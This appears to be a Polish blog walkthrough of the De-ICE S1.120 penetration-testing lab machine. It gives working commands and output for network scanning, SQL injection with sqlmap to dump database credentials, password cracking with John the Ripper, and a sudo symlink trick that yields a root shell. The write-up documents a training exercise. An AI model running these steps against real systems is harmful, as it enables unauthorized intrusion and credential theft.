[Pentesty][De-ICE] Scenariusz testowania zabezpieczeń „De-ICE S1.120”

Jednym z sposobów nauki zabezpieczeń jest ich sukcesywne testowanie i łamanie, utworzono specjalne scenariusze dzięki którym można się sporo nauczyć z danej tematatyki, od używania konkretnych narzędzi po sposób myślenia podczas badania sieci – bezpieczeń.

Wybrany opisywany scenariusz to : „De-ICE S1.120” – więcej informacji na temat scenariusz można znaleźć w sieci,

ISO:  De-ICE S1.120

Sieć: 192.168.1.120 [ system widoczny w sieci po uruchomieniu ]

# Badamy sieć wewnętrzną

netdiscover -r 192.168.1.0/24 -i eth2
Currently scanning: Finished! | Screen View: Unique Hosts
1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 60
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
—————————————————————————–
192.168.1.120 08:00:27:37:ba:3d 01 060 CADMUS COMPUTER SYSTEMS

 

# Badamy określonego hosta:

root@kali:~/de-ice/1.120# nmap -n -sV -A -p- 192.168.1.120
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x 2 0 0 40 Jan 2 2011 incoming
22/tcp open ssh OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey:
| 1024 f0:90:25:9a:9e:cd:bd:31:ec:e9:f4:11:47:2f:69:a4 (DSA)
|_ 2048 06:32:d9:26:9a:53:f0:78:9c:43:fd:9c:50:26:d0:64 (RSA)
80/tcp open http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp open ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after: 2010-09-30T08:10:30+00:00
|_ssl-date: 2014-04-23T11:50:09+00:00; -2s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_IDEA_128_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:37:BA:3D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 – 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.1.120

 

# Wykonujemy atak sql-injection na odkrytą przez nmap stron www na adresie IP 192.168.1.120

root@kali:~/de-ice/1.120# sqlmap -u http://192.168.1.120/products.php?id=NULL

root@kali:~/de-ice/1.120# sqlmap -u http://192.168.1.120/products.php?id=NULL –users –passwords

# Po uzyskaniu haseł za pomocą narzędzia sqlmap ( haseł dostępowych do sql ), wykorzystujemy narzedzie john the ripper

root@kali:~/de-ice/1.120# john /tmp/sqlmaphashes-BMaKet.txt

# Sprawdzamy przykładowy uzyskany dostęp :

root@kali:~/de-ice/1.120# ssh bbanter @ 192.168.1.120

# Sprawdzamy kolejno plik passwd /etc/group , uzyskujemy tutaj informacje o istnieniu usera ccoffee który należy do grupy admin ,

# Po zalogowaniu na usera ccoffee , widzimy że ma on możliwość uruchomienia pliku z parawami roota

ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
(root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

# Używamy skrótu aby dodać uruchamianie powłoki /bin/bash

ccoffee@slax:~$ mv scripts/getlogs.sh scripts/getlogs.sh.bkup
ccoffee@slax:~$ ln -s /bin/bash scripts/getlogs.sh
ccoffee@slax:~$ sudo scripts/getlogs.sh
root@slax:~# id

# Gotowe 🙂

Dodaj komentarz